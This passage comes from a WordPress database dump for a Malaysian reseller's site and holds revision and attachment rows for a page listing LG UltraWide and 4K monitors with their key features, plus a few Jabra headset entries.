Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n<h1></h1>\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-17 11:46:05','2018-12-17 03:46:05','',1546,'https://bintara.com.my/blog/2018/12/17/1546-revision-v1/',0,'revision','',0),(2269,1,'2018-12-17 11:46:36','2018-12-17 03:46:36','','medium01 (2)','','inherit','closed','closed','','medium01-2','','','2018-12-17 11:46:36','2018-12-17 03:46:36','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/medium01-2.jpg',0,'attachment','image/jpeg',0),(2270,1,'2018-12-17 11:47:44','2018-12-17 03:47:44','','medium01 (3)','','inherit','closed','closed','','medium01-3','','','2018-12-17 11:47:44','2018-12-17 03:47:44','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/medium01-3.jpg',0,'attachment','image/jpeg',0),(2456,1,'2018-12-18 21:21:35','2018-12-18 13:21:35','','Jabra Pro 9400 Duo & Mono','','inherit','closed','closed','','jabra-pro-9400-duo-mono','','','2018-12-18 21:21:35','2018-12-18 13:21:35','',1532,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Pro-9400-Duo-Mono.png',0,'attachment','image/png',0),(2271,1,'2018-12-17 11:48:48','2018-12-17 03:48:48','','medium01 (4)','','inherit','closed','closed','','medium01-4','','','2018-12-17 11:48:48','2018-12-17 03:48:48','',1546,'https://bintara.com.my/wp-content/uploads/2018/12/medium01-4.jpg',0,'attachment','image/jpeg',0),(2272,1,'2018-12-17 11:49:08','2018-12-17 03:49:08','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n<h1></h1>\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2269 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-2-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2270 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-3-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD58-B (27â€ IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>Realistic Gaming Experience</li>\r\n 	<li>Clear, Live Gaming Scenes with FreeSync</li>\r\n 	<li>High-End Gaming Features</li>\r\n 	<li>Optimized Game Settings</li>\r\n 	<li>Edit Perfect Visual</li>\r\n 	<li>User-friendly, Easy On Screen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2271 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-4-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">43UD79-B (43\" Class 4K UHD IPS LED Monitor (42.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS</li>\r\n 	<li>HDCP 2.2 Compatible</li>\r\n 	<li>USB Type Câ„¢</li>\r\n 	<li>4x HDMI Inputs</li>\r\n 	<li>On Screen Control</li>\r\n 	<li>Factory Calibrated</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-17 11:49:08','2018-12-17 03:49:08','',1546,'https://bintara.com.my/blog/2018/12/17/1546-revision-v1/',0,'revision','',0),(2273,1,'2018-12-17 11:50:10','2018-12-17 03:50:10','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\nExplore all you have ever wanted in a monitor with LGâ€™s 21:9 Ultrawide. featuring a wider viewing space experience suitable for both work and gaming.\r\n\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n<h1></h1>\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2269 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-2-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2270 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-3-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD58-B (27â€ IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>Realistic Gaming Experience</li>\r\n 	<li>Clear, Live Gaming Scenes with FreeSync</li>\r\n 	<li>High-End Gaming Features</li>\r\n 	<li>Optimized Game Settings</li>\r\n 	<li>Edit Perfect Visual</li>\r\n 	<li>User-friendly, Easy On Screen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2271 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-4-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">43UD79-B (43\" Class 4K UHD IPS LED Monitor (42.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS</li>\r\n 	<li>HDCP 2.2 Compatible</li>\r\n 	<li>USB Type Câ„¢</li>\r\n 	<li>4x HDMI Inputs</li>\r\n 	<li>On Screen Control</li>\r\n 	<li>Factory Calibrated</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-17 11:50:10','2018-12-17 03:50:10','',1546,'https://bintara.com.my/blog/2018/12/17/1546-revision-v1/',0,'revision','',0),(2863,1,'2019-02-07 16:41:59','2019-02-07 08:41:59','[vfb id=12]','Get Quotation (Jabra Evolve)','','inherit','closed','closed','','2862-revision-v1','','','2019-02-07 16:41:59','2019-02-07 08:41:59','',2862,'https://bintara.com.my/blog/2019/02/07/2862-revision-v1/',0,'revision','',0),(2457,1,'2018-12-18 21:22:08','2018-12-18 13:22:08','','Jabra Evolve 75e','','inherit','closed','closed','','jabra-evolve-75e','','','2018-12-18 21:22:08','2018-12-18 